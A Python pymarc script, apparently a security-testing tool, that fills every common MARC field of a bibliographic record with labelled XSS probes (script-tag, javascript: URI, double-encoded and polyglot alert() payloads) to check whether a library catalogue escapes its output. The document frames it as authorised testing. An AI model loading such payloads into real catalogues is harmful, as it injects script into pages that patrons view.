MARC XSS
010$a | |
020$acz | |
040$acd | |
100$abcqd | |
130$aplsf | |
240$alf | |
245$ahpbc | |
246$a | |
250$a | |
260$abc | |
300$abce | |
490$av | |
500$a | |
504$a | |
505$a | |
520$ab | |
600$abcqdtvxyz2 | |
610$abvxyz2 | |
650$avxyz2 | |
651$avxyz2 | |
700$abcqde4 | |
710$ab | |
740$a | |
800$abcqdtv | |
830$av |
from pymarc import Record, Field | |
import string | |
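# Field/subfield list taken from http://www.loc.gov/marc/umb/um07to10.html
# (one "TAG$codes" line per field, e.g. "245$ahpbc").
def load_field_specs(path="commonfields.txt"):
    """Read "TAG$codes" lines into ``{tag: [subfield codes]}``.

    Args:
        path: text file with one field spec per line, e.g. "650$avxyz2".

    Returns:
        dict mapping the 3-character MARC tag to the list of subfield codes
        that follow the "$".

    Raises:
        ValueError: a non-blank line has no "$" separator (the old code
            raised a bare IndexError here, which is hard to diagnose).
    """
    specs = {}
    with open(path, encoding="utf-8") as f:
        for raw in f:
            line = raw.strip()
            if not line:
                continue  # a trailing blank line used to crash with IndexError
            parts = line.split("$")
            if len(parts) < 2:
                raise ValueError("field spec without '$': %r" % (line,))
            # Only the first code group is used; any further "$" groups are
            # ignored, exactly as before.
            specs[parts[0]] = list(parts[1])
    return specs


fields_to_create = load_field_specs()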
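# Probe templates, keyed by name.  "{m}" is replaced with the marker
# ("tag-subfield") so a firing alert() tells you which MARC field the
# catalogue rendered without escaping.
_PAYLOADS = {
    # Closes a quoted attribute, then injects a script element (the default).
    "script": '"><script>alert("{m}");</script>',
    # Only fires if the UI turns the raw value into a link target (href/src).
    "uri": "javascript:alert('XSS')",
    # Double URL-encoded (%25 -> %): catches UIs that decode the value twice.
    "double_encoded": "%253Cscript%253Ealert('{m}')%253C%252Fscript%253E",
    # Polyglot: closes several common contexts before an svg onload handler.
    "polyglot": "javascript:/*--></title></style></textarea></script></xmp>"
                "<svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert({m})//'>",
}


def payload(a, *, kind="script"):
    """Return an XSS probe string that carries the marker *a*.

    These are harmless alert() probes for authorised testing of a library
    catalogue's output encoding; they must not be loaded into a production
    system.

    Args:
        a: marker embedded in the alert() call, normally "<tag>-<subfield>",
           so a firing alert identifies the field that was not escaped.
        kind: which template from ``_PAYLOADS`` to use.  The default
           "script" reproduces the original single-payload behaviour.

    Returns:
        The probe string.

    Raises:
        KeyError: unknown *kind*.
        ValueError: *a* contains a quote character, which would terminate the
            JS string literal early and make the probe silently invalid.
    """
    if '"' in a or "'" in a:
        raise ValueError("marker must not contain quote characters: %r" % (a,))
    # str.replace rather than str.format so braces in *a* cannot break it.
    return _PAYLOADS[kind].replace("{m}", a)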
# Build one record holding every common field, with each subfield filled by a
# labelled XSS probe.  Load it ONLY into a test/staging catalogue you are
# authorised to test: a production OPAC that fails to escape these values
# would pop alerts for every patron who views the record.
record = Record()
for tag, codes in fields_to_create.items():
    # Flat [code, value, code, value, ...] subfield form.
    # NOTE(review): newer pymarc releases use Subfield objects instead of the
    # flat list -- confirm the installed version still accepts this form.
    flat = []
    for code in codes:
        marker = tag + "-" + code  # e.g. "245-a": the alert names the leaking field
        flat += [code, payload(marker)]
    record.add_field(Field(tag=tag, indicators=['0', '0'], subfields=flat))
# Two ways to get the record out.  The text form can be copy-pasted into a
# flat MARC text editor ...
print(record)
# ... or write the binary form; as_marc() yields bytes, hence mode "wb".
marc_bytes = record.as_marc()
with open('file.dat', 'wb') as out:
    out.write(marc_bytes)